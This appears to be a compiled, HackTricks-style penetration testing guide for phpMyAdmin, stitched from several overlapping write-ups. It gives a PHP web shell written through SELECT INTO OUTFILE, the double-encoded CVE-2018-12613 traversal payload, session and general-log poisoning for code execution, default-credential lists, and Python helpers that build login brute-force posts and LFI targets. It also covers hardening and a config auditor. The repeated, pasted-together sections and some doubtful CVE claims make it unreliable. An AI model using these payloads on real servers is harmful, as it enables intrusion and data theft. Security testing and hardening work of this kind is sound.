phpMyAdmin | HackTricks
To conduct a penetration test or security audit of phpMyAdmin (PMA) effectively, you need to understand the path from initial access to Remote Code Execution (RCE). phpMyAdmin is a web-based interface for managing MySQL and MariaDB, which makes it a high-value target.

🔍 Initial Discovery and Enumeration
Before attempting an exploit, identify the version and configuration.
Version Detection: Check the /README or /ChangeLog files.
Default Credentials: Try root:root, root with an empty password, or admin:admin.
Setup Page: Check whether /setup/index.php is reachable; it allows the server configuration to be rewritten.
Config Files: Look for config.inc.php backups, or for credentials leaked in .bash_history.

🔓 Authentication Bypass & Credential Access
If you cannot log in directly, look for misconfigurations that leak access.
Empty Password: Many local environments leave the root password blank.
Config File Leakage: If the server has a Local File Inclusion (LFI), target /etc/phpmyadmin/config.inc.php.
Brute Force: Use tools like Hydra or Burp Suite against the index.php login form.

🚀 Exploitation: From Access to RCE
Once authenticated (or through a specific vulnerability), the goal is usually to execute commands on the underlying server.

1. SQL Query to Shell (INTO OUTFILE)
If the MySQL user holds the global FILE privilege and secure_file_priv does not restrict the destination, you can write a web shell directly into the web root from the SQL tab (no injection is needed; phpMyAdmin executes arbitrary queries by design). Query:
SELECT '<?php system($_GET["cmd"]); ?>' INTO OUTFILE '/var/www/html/shell.php';
Requirement: You must know the absolute path of the web directory, and the mysqld OS user must be able to write there.

2. Local File Inclusion (LFI)
Older versions of phpMyAdmin are known for LFI vulnerabilities.
CVE-2018-12613: Allows an authenticated user to include local files via the target parameter (versions 4.8.0 and 4.8.1; fixed in 4.8.2).
Payload: /index.php?target=db_sql.php%253f/../../../../../../etc/passwd

3. Session File Inclusion (Session Poisoning)
If LFI is possible but there is no shell on disk to include, poison your own PHP session file. Execute a query whose text contains PHP, for example SELECT '<?php phpinfo(); ?>'; phpMyAdmin keeps the query in the session. Find your phpMyAdmin session ID (the value of the phpMyAdmin cookie).
Include the session file: /var/lib/php/sessions/sess_[YOUR_SID] (the Debian/Ubuntu default; session.save_path may differ on other systems).

🛠️ Post-Exploitation & Data Exfiltration
After gaining access to the database, work toward full system compromise.
User Table Dumping: Look for wp_users (WordPress) or users tables and crack the hashes.
Privilege Escalation: Check whether the database user can load a UDF (User Defined Function) such as sys_eval() from lib_mysqludf_sys to run OS commands; this normally requires the FILE privilege to drop the shared library into plugin_dir.
Sensitive Information: Search all tables for "password", "key", or "config".

🛡️ Mitigation & Hardening
To secure a phpMyAdmin installation, follow these industry standards:
IP Whitelisting: Restrict access to specific IP addresses via .htaccess or Nginx config.
Two-Factor Authentication (2FA): Enable PMA's built-in 2FA support.
Disable Root Login: Force the use of non-privileged database users for daily tasks (set $cfg['Servers'][$i]['AllowRoot'] = false).
Update Regularly: Ensure you are on the latest stable branch to patch known LFI/CSRF flaws.
For those assessing the security of phpMyAdmin installations, HackTricks provides a comprehensive guide focused on reconnaissance and exploitation techniques. The methodology generally follows a path from basic identification to Remote Code Execution (RCE).

1. Initial Reconnaissance & Login
Version Identification: Locate the version by checking the /README or /ChangeLog files, or look for the PMA_VERSION string in the page source.
Default Credentials: Always test common defaults like root:root, root:admin, or root with no password. Some systems may also have anonymous login enabled.
Weak Credentials: If defaults fail, attempt a dictionary attack. Many environments lack rate limiting; where it exists it is sometimes keyed on the client IP and can be bypassed with headers such as X-Forwarded-For.

2. Post-Authentication Exploitation
Once logged in, the primary goal is often to pivot from database access to server-level access.

Writing a Web Shell (SELECT ... INTO OUTFILE):
If the database user has the FILE privilege and you know the absolute web path (e.g., /var/www/html), you can write a PHP shell directly to disk.
Prerequisite check: Run SHOW VARIABLES LIKE '%secure_file_priv%'; to see whether file exports are restricted (an empty value means unrestricted, NULL means disabled, a directory means writes are confined to it).

Local File Inclusion (LFI) to RCE:
Vulnerability Example: Versions 4.8.0 and 4.8.1 are vulnerable to a path traversal flaw in the target parameter (CVE-2018-12613).
Technique: Execute a SQL query containing PHP code (e.g., SELECT '<?php phpinfo(); ?>';) so that it is stored in your session. Then include the session file (/var/lib/php/sessions/sess_[YOUR_SESSION_ID] on Debian-based systems) via the vulnerable target parameter to execute the code.

3. Advanced Persistence and Attacks
Configuration Files: Check config.inc.php, which may contain hardcoded credentials for the configured servers (the control user or even the root database user).
PHP Wrappers: Use PHP wrappers (such as php://filter) together with a file inclusion vulnerability to read the source of sensitive configuration files instead of executing them.

Summary of Common Vulnerabilities
Vulnerability Type   Description
Default Creds        Using common login pairs like root:root.
CVE-2018-12613       LFI vulnerability in versions 4.8.0-4.8.1 used for RCE.
INTO OUTFILE         Writing malicious scripts to the web root if permissions allow.
Setup Scripts        Older versions may have a /setup directory left accessible which can be used to reconfigure the server.
This guide outlines penetration testing techniques and security best practices for phpMyAdmin, drawing on common methodologies documented by researchers and platforms like HackTricks.

I. Vulnerability Identification & Reconnaissance
The first step is identifying the specific version of phpMyAdmin and discovering the server's file paths.
Version Detection: Attackers often check for sensitive files to determine the version, such as README, changelog.php, or Documentation.html.
Path Discovery: Knowing the absolute web path is critical for many exploits. Common methods include:
- Checking phpinfo() pages if accessible (DOCUMENT_ROOT and SCRIPT_FILENAME give the path directly).
- Fuzzing for web error messages that reveal directory structures.
- Querying the database with show variables like '%datadir%'; (this returns the MySQL data directory rather than the web root, but it reveals the install layout and is a good place to start guessing).

II. Common Exploitation Techniques
Once an instance is identified, several techniques can be used to gain deeper access.
Default Credentials: Many instances remain vulnerable to common default logins (e.g., root with no password).
Remote Code Execution (RCE) via LFI: Specific versions (4.8.0 and 4.8.1) have a known Local File Inclusion (LFI) vulnerability, CVE-2018-12613, which authenticated users can leverage for RCE.
Writing Webshells (INTO OUTFILE): If the secure_file_priv variable is empty and the user has the FILE privilege, attackers can write a PHP webshell directly to the webroot.
Example: SELECT '<?php system($_GET["cmd"]); ?>' INTO OUTFILE '/var/www/html/shell.php';
Log File Manipulation: If direct file writing is restricted, an attacker with the SUPER privilege (SYSTEM_VARIABLES_ADMIN on MySQL 8) can enable the General Query Log, point general_log_file at a .php file in the webroot, and run a query containing PHP code to "poison" the log. secure_file_priv does not apply to the log file, but the mysqld OS user must be able to write to the destination.

III. Security Hardening Best Practices
To mitigate these risks, administrators should implement layered security controls.

Restrict Access:
IP Whitelisting: Use web server configuration (Apache/Nginx) to allow only trusted IP addresses.
VPN/SSH Tunneling: The most robust option is to expose phpMyAdmin only through a VPN or an SSH tunnel.

Authentication & Credential Security:
Extra Login Layer: Use .htaccess or HTTP Basic Authentication to add a prompt before the phpMyAdmin login page.
Two-Factor Authentication (2FA): Enable 2FA for all user accounts.
Disable Root Login: Create specific user accounts with limited privileges instead of using the root account for daily tasks.

Environment Hardening:
Change Default URL: Rename the /phpmyadmin directory to a random, non-obvious string to deter automated bots.
Keep Updated: Regularly patch to the latest version to protect against known CVEs.
Configure MySQL Settings: Set secure_file_priv in my.cnf to a specific, restricted directory (or to NULL to disable file import/export entirely) to prevent unauthorized file writes. The variable is read-only at runtime, so a server restart is required, and it does not restrict general_log_file; that path is covered by not granting SUPER.
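A check for the hardening items above, as an added Python example (it is not from the page or from phpMyAdmin): it reads a config.inc.php and flags the settings an auditor looks for. Both configuration excerpts are constructed for the example. The keys it inspects (auth_type, AllowNoPassword, AllowRoot, AllowArbitraryServer, AllowDeny, blowfish_secret) are real phpMyAdmin settings, and the defaults assumed are the documented ones (AllowRoot true; AllowNoPassword and AllowArbitraryServer false).

```python
import re
from typing import Dict, List

# Constructed config.inc.php excerpts (not from any real deployment): one with
# the weak settings the hardening section warns about, one hardened.
WEAK_CONFIG = r"""<?php
$cfg['blowfish_secret'] = '';
$i = 1;
$cfg['Servers'][$i]['auth_type'] = 'config';
$cfg['Servers'][$i]['user'] = 'root';
$cfg['Servers'][$i]['password'] = '';
$cfg['Servers'][$i]['AllowNoPassword'] = true;
$cfg['Servers'][$i]['AllowRoot'] = true;
$cfg['AllowArbitraryServer'] = true;
"""

HARDENED_CONFIG = r"""<?php
$cfg['blowfish_secret'] = 'c7b0f9e2a4d1c8e5f3a6b9d2e4f7a1c3';
$i = 1;
$cfg['Servers'][$i]['auth_type'] = 'cookie';
$cfg['Servers'][$i]['AllowNoPassword'] = false;
$cfg['Servers'][$i]['AllowRoot'] = false;
$cfg['Servers'][$i]['AllowDeny']['order'] = 'deny,allow';
$cfg['Servers'][$i]['AllowDeny']['rules'] = ['deny % from all', 'allow % from 10.0.0.0/8'];
$cfg['AllowArbitraryServer'] = false;
"""

# One "$cfg[...][...] = value;" assignment per line, as config.inc.php is written.
ASSIGN_RE = re.compile(r"^\s*\$cfg((?:\[[^\]]+\])+)\s*=\s*(.+?);\s*$", re.M)


def parse_config(text: str) -> Dict[str, str]:
    """Map 'Servers.*.AllowRoot' style keys to raw values; the $i server index becomes '*'."""
    settings: Dict[str, str] = {}
    for keys, value in ASSIGN_RE.findall(text):
        parts = re.findall(r"\[([^\]]+)\]", keys)
        key = ".".join("*" if p.startswith("$") else p.strip("'\"") for p in parts)
        settings[key] = value.strip().strip("'\"")
    return settings


def _flag(cfg: Dict[str, str], key: str, default: bool) -> bool:
    value = cfg.get(key)
    return default if value is None else value.lower() == "true"


def audit(text: str) -> List[str]:
    """Findings an auditor wants from config.inc.php; defaults are phpMyAdmin's documented ones."""
    cfg = parse_config(text)
    findings: List[str] = []
    if cfg.get("Servers.*.auth_type", "cookie") == "config":
        findings.append("auth_type=config: MySQL credentials live in config.inc.php and nobody is prompted to log in")
    if _flag(cfg, "Servers.*.AllowNoPassword", False):
        findings.append("AllowNoPassword=true: MySQL accounts with an empty password can log in")
    if _flag(cfg, "Servers.*.AllowRoot", True):
        findings.append("AllowRoot=true (the default): root can log in through the web interface")
    if _flag(cfg, "AllowArbitraryServer", False):
        findings.append("AllowArbitraryServer=true: users can point phpMyAdmin at an attacker-controlled MySQL server")
    if not cfg.get("blowfish_secret"):
        findings.append("blowfish_secret is empty: the cookie-auth credential cookie is not properly encrypted")
    if "Servers.*.AllowDeny.rules" not in cfg:
        findings.append("no AllowDeny rules: no application-level source-IP restriction (web-server rules may still apply)")
    return findings
```

The AllowDeny finding is deliberately a warning rather than a hard failure: a deployment that restricts the path in Apache or Nginx, or sits behind a VPN, may have no application-level rules and still be fine, so read it together with the web server configuration.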
Penetration Testing phpMyAdmin: Exploitation Techniques and HackTricks
phpMyAdmin is one of the most widely used web-based tools for administering MySQL and MariaDB databases. Its ubiquity makes it a high-value target for security researchers and attackers alike. This guide synthesizes methodologies from HackTricks and other industry sources to outline the full lifecycle of a phpMyAdmin penetration test, from initial reconnaissance to achieving Remote Code Execution (RCE).

Phase 1: Reconnaissance and Fingerprinting
The first step in any engagement is identifying the instance and its version, as vulnerabilities are highly version-dependent.
Standard Path Discovery: Common default directories include /phpmyadmin/, /pma/, and /setup/.

Version Identification:
Login Page: Check the HTML source for version comments or meta tags, and for the v=<version> suffix phpMyAdmin appends to its own script and stylesheet URLs.
ChangeLog: Accessing /ChangeLog or /Documentation.html can often reveal the exact version if not properly restricted.
HTTP Headers: Look for X-Powered-By: PHP or Set-Cookie: phpMyAdmin=..., which confirm the application type but not the version.

Phase 2: Authentication Testing
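Fingerprinting and the first login attempt, as one added Python example (not code from HackTricks or from the page): the version is pulled from ChangeLog, README or the v= asset suffix on the login page, the phpMyAdmin cookie confirms the application, and the hidden token and set_session fields are lifted from the login form so that a default-credential attempt posts a form phpMyAdmin will accept. All sample responses are constructed; the field names pma_username, pma_password, server, token and set_session are those of phpMyAdmin's cookie-auth login form, and the error string is the one it shows for a MySQL #1045 refusal.

```python
import re
from typing import Dict, Optional

# Constructed sample responses (not captured from a real host), shaped like
# what the paths discussed above return.
SAMPLE_CHANGELOG = (
    "phpMyAdmin - ChangeLog\n"
    "======================\n\n"
    "4.8.1 (2018-05-23)\n"
    "- bug Fix for an issue in the Designer view\n"
)
SAMPLE_README = "phpMyAdmin - Readme\n===================\n\nVersion 4.8.1\n"
SAMPLE_LOGIN_HTML = (
    '<script src="js/get_scripts.js.php?scripts%5B%5D=vendor/jquery/jquery.min.js&v=4.8.1"></script>\n'
    '<form method="post" id="login_form" action="index.php" name="login_form">\n'
    '<input type="text" name="pma_username" id="input_username">\n'
    '<input type="password" name="pma_password" id="input_password">\n'
    '<input type="hidden" name="server" value="1">\n'
    '<input type="hidden" name="set_session" value="0123456789abcdef0123456789abcdef">\n'
    '<input type="hidden" name="token" value="feedfacecafebeef">\n'
    "</form>\n"
)
SAMPLE_HEADERS = {"Set-Cookie": "phpMyAdmin=0123456789abcdef0123456789abcdef; path=/; HttpOnly"}

VERSION = r"(\d+\.\d+\.\d+(?:\.\d+)?(?:-(?:alpha|beta|rc)\d*)?)"


def version_from_changelog(body: str) -> Optional[str]:
    """The first '<version> (<date>)' heading in ChangeLog is the shipped release."""
    m = re.search(r"^" + VERSION + r"\s+\(\d{4}-\d{2}-\d{2}\)", body, re.M)
    return m.group(1) if m else None


def version_from_readme(body: str) -> Optional[str]:
    m = re.search(r"^Version\s+" + VERSION, body, re.M)
    return m.group(1) if m else None


def version_from_html(body: str) -> Optional[str]:
    """phpMyAdmin tags its own script and stylesheet URLs with v=<version>."""
    m = re.search(r"[?&]v=" + VERSION, body)
    return m.group(1) if m else None


def looks_like_phpmyadmin(headers: Dict[str, str]) -> bool:
    """The session cookie is literally named phpMyAdmin; it proves the app, not the version."""
    return re.search(r"(?:^|[;,]\s*)phpMyAdmin=", headers.get("Set-Cookie", "")) is not None


def fingerprint(changelog: str = "", readme: str = "", html: str = "") -> Optional[str]:
    """Return the first version any source yields, most reliable source first."""
    for body, extract in ((changelog, version_from_changelog),
                          (readme, version_from_readme),
                          (html, version_from_html)):
        version = extract(body) if body else None
        if version:
            return version
    return None


def hidden_field(html: str, name: str) -> Optional[str]:
    m = re.search(r'name="%s"\s+value="([^"]*)"' % re.escape(name), html)
    return m.group(1) if m else None


def build_login_post(login_html: str, username: str, password: str) -> Dict[str, str]:
    """Form body for one login attempt. The token is tied to the session that
    served the page, so the POST must carry that page's cookie as well."""
    form = {"pma_username": username, "pma_password": password,
            "server": hidden_field(login_html, "server") or "1"}
    for name in ("token", "set_session"):
        value = hidden_field(login_html, name)
        if value is None:
            raise ValueError("login page is missing hidden field " + name)
        form[name] = value
    return form


def login_failed(response_html: str) -> bool:
    """phpMyAdmin reports rejected MySQL credentials as error #1045."""
    return "Cannot log in to the MySQL server" in response_html
```

A brute-force loop wraps build_login_post in a GET of the login page followed by a POST that replays the cookie from that GET; a token lifted from one session and replayed without its cookie is rejected, which is why naive Hydra form templates that hard-code the hidden fields fail against phpMyAdmin.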
Gaining access to the administrative interface is often the bridge to complete database compromise.

Default Credentials
Many instances are deployed with weak or default credentials. Common combinations to test include:
- Username: root / Password: (empty)
- Username: root / Password: root, password, or mysql
- Username: admin / Password: admin

Exploiting Configuration Flaws
Empty Password Bypass: In some setups, such as XAMPP, the root user has no password set by default; phpMyAdmin only accepts an empty password when $cfg['Servers'][$i]['AllowNoPassword'] is true, which XAMPP ships enabled.
Exposed Setup Script: Older versions sometimes left /scripts/setup.php or /setup/index.php accessible without authentication, potentially allowing configuration manipulation.
Config File Exposure: If config.inc.php or its backups (like config.inc.php.bak) are accessible, they may contain plaintext credentials for the database.

Phase 3: Post-Authentication Exploitation
Once authenticated, an attacker can move beyond data theft toward full server compromise.

Achieving Shell Access (Getshell)
There are several methods to transition from database access to a web shell:
SELECT INTO OUTFILE: If the MySQL user has the FILE privilege, secure_file_priv permits the destination, and the absolute web root path is known, you can write a shell directly:
SELECT '<?php system($_GET["cmd"]); ?>' INTO OUTFILE '/var/www/html/shell.php';
General Log Manipulation: By enabling the general log (SET GLOBAL general_log = 'ON') and pointing general_log_file at a .php file in the web root, an attacker with the SUPER privilege can execute code simply by running a SQL query that contains PHP tags.

Local File Inclusion (LFI) to RCE
A critical vulnerability, CVE-2018-12613, affected phpMyAdmin versions 4.8.0 and 4.8.1. It allowed authenticated users to include arbitrary local files on the server.
Mechanism: The target parameter in index.php was validated after an extra urldecode(), so a double-encoded question mark (%253f, which PHP receives as %3f) let the check see the allow-listed db_sql.php while include() received a traversal path.
Exploitation Path: An attacker runs a query such as SELECT '<?php phpinfo(); ?>'; so that phpMyAdmin stores it in the session, then includes their own session file (sess_<phpMyAdmin cookie value>) through the vulnerable parameter, executing the embedded PHP.
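To make the mechanism concrete, here is an added Python model of the target check (it is not phpMyAdmin's PHP; the goto allow-list is shortened to four entries and the session directory is the Debian/Ubuntu default, both assumptions). It shows why the double-encoded payload passes the 4.8.0/4.8.1 check, why the 4.8.2 fix rejects it, how include() resolves the path out of the web root, and where the session file to poison lives.

```python
from urllib.parse import unquote

# Python model of the target-parameter check in index.php of phpMyAdmin
# 4.8.0/4.8.1 and of the 4.8.2 fix. Not the project's PHP: the goto allow-list
# is shortened to four entries and the session path is the Debian/Ubuntu default.
GOTO_WHITELIST = ["db_sql.php", "db_structure.php", "tbl_sql.php", "server_sql.php"]
TARGET_BLACKLIST = ["import.php", "export.php"]
SESSION_DIR = "/var/lib/php/sessions"


def check_page_validity(page: str, include: bool = False) -> bool:
    """4.8.0/4.8.1 behaviour with include=False. 4.8.2 added the include flag:
    when it is set, only an exact allow-list entry is accepted."""
    if page in GOTO_WHITELIST:
        return True
    if include:
        return False
    # Retry with any query string removed.
    if page.split("?", 1)[0] in GOTO_WHITELIST:
        return True
    # Retry after one more urldecode. This is the bug: PHP already decoded the
    # query string once (%253f -> %3f); this second decode turns %3f into '?',
    # so the check sees 'db_sql.php' while include() still gets the raw value.
    return unquote(page).split("?", 1)[0] in GOTO_WHITELIST


def target_accepted(target: str, patched: bool) -> bool:
    """All conditions index.php applies to $_REQUEST['target'] before include()."""
    return (target != ""
            and not target.startswith("index")
            and target not in TARGET_BLACKLIST
            and check_page_validity(target, include=patched))


def include_path(webroot: str, target: str) -> str:
    """PHP resolves '..' in an include path lexically, without requiring the
    bogus 'db_sql.php%3f' component to exist, so the traversal leaves the web root."""
    parts = []
    for piece in (webroot + "/" + target).split("/"):
        if piece in ("", "."):
            continue
        if piece == "..":
            if parts:
                parts.pop()
        else:
            parts.append(piece)
    return "/" + "/".join(parts)


def traversal_target(path: str, depth: int = 6) -> str:
    """Value to send in the URL: the client sends %253f so that PHP's single
    decode hands index.php 'db_sql.php%3f/...'."""
    return "db_sql.php%253f/" + "../" * depth + path.lstrip("/")


def as_received_by_php(url_value: str) -> str:
    """What $_REQUEST['target'] contains: the query string decoded exactly once."""
    return unquote(url_value)


def session_file(cookie_value: str) -> str:
    """The PHP session file for the phpMyAdmin cookie value; it holds the last
    SQL query, which is why SELECT '<?php ... ?>' makes it an includable script."""
    return SESSION_DIR + "/sess_" + cookie_value
```

Six levels of ../ are enough from any install path with at most five components; extra levels are harmless because the lexical normalisation stops at the root. On a host with a non-default session.save_path (or Redis-backed sessions) the session-file step fails and another on-disk file containing attacker text is needed.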
In 2025 and early 2026, security reports for phpMyAdmin have shifted from simple misconfigurations to edge-case vulnerabilities involving library interactions and specific feature abuse. While classic HackTricks methods like SELECT ... INTO OUTFILE remain relevant for older systems, recent research focuses on authenticated XSS and library-level RCE.

Current Critical Vulnerabilities (2025-2026)
Recent advisories highlight that even patched systems can be vulnerable because of underlying server libraries:
CVE-2024-2961 (glibc/iconv RCE): A critical vulnerability in glibc's iconv implementation can lead to Remote Code Execution through phpMyAdmin's export functionality. Condition: Requires the PHP iconv extension to be loaded and a specific vulnerable character set to be used during export. Mitigation: Upgrade to phpMyAdmin 5.2.2 and patch glibc.
CVE-2025-24530 (XSS in "Check tables"): Authenticated users can trigger an XSS attack by using a specially crafted table or database name.
CVE-2025-24529 (XSS in "Insert"): An authenticated user can execute malicious scripts through the "Insert" tab functionality.
CVE-2022-0813 (Information Disclosure): This flaw allows attackers to leak sensitive configuration data through malformed parameters, and it continued to be reported as a significant risk in early 2026.

Advanced Exploitation Techniques (HackTricks Style)
Penetration testers and researchers from platforms like HackTricks group phpMyAdmin attacks into three main tiers:
Authenticated RCE via Local File Inclusion (LFI), CVE-2018-12613: Still the most common lab example for versions 4.8.0/4.8.1. Attackers use the target parameter to include session files into which they have previously injected PHP code.
Webshell via SQL Misconfiguration (INTO OUTFILE): If the MySQL user has the FILE privilege and the webroot path is known, an attacker can write a shell directly to the server:
SELECT '<?php system($_GET["cmd"]); ?>' INTO OUTFILE '/var/www/html/shell.php';
Client-Side Attacks (Arbitrary File Read): HackTricks notes that if an attacker can make phpMyAdmin connect to a malicious MySQL server (possible when $cfg['AllowArbitraryServer'] is enabled), the rogue server can request files through the MySQL client's LOAD DATA LOCAL INFILE handling and read them from the host running phpMyAdmin, with the web server's privileges.
Conclusion
phpMyAdmin is a powerful tool but can become an easy attack vector when exposed, misconfigured, or unpatched. Combining network restrictions, least-privilege database design, strong authentication, diligent patching, and continuous monitoring significantly reduces risk. Administrators should treat phpMyAdmin as a high-risk administration interface and apply defense-in-depth controls accordingly.
Part 1: Reconnaissance and Fingerprinting
Before launching an attack, you need to identify whether phpMyAdmin is present.

Version Detection
- The default login page often reveals the version in its source code.
- /phpmyadmin/README, /phpmyadmin/Documentation.html, /phpmyadmin/ChangeLog, and /?=phpinfo() if enabled.

Part 2: Authentication Bypasses
The most common entry point is weak or default credentials.

2.1 Default Credentials
- root:(no password) – common in XAMPP/WAMP.
- root:root
- root:toor
- pma:pmapass (the control user)
- mysql:mysql

CVE-2016-5734 (Authenticated RCE)
In 4.6.x before 4.6.3 (and in 4.0.x before 4.0.10.16 and 4.4.x before 4.4.15.7), the table search-and-replace feature passed user input into preg_replace() in a way that let a null byte inject the /e (eval) modifier, leading to PHP code execution. It requires valid credentials, a table the user can edit, and PHP older than 5.4.7; later PHP versions are not affected by the null-byte trick.

Step 3: Post-Authentication Exploitation
Once inside, the attacker checks SELECT @@version, SELECT @@secure_file_priv, and SHOW VARIABLES LIKE 'basedir'.
- If secure_file_priv is empty → they can read/write anywhere the MySQL OS user has permissions.
- If secure_file_priv is set to a directory → they are restricted to that folder (often /tmp or a MySQL directory such as /var/lib/mysql-files).
- If secure_file_priv = NULL → file operations are disabled (best case for the defender).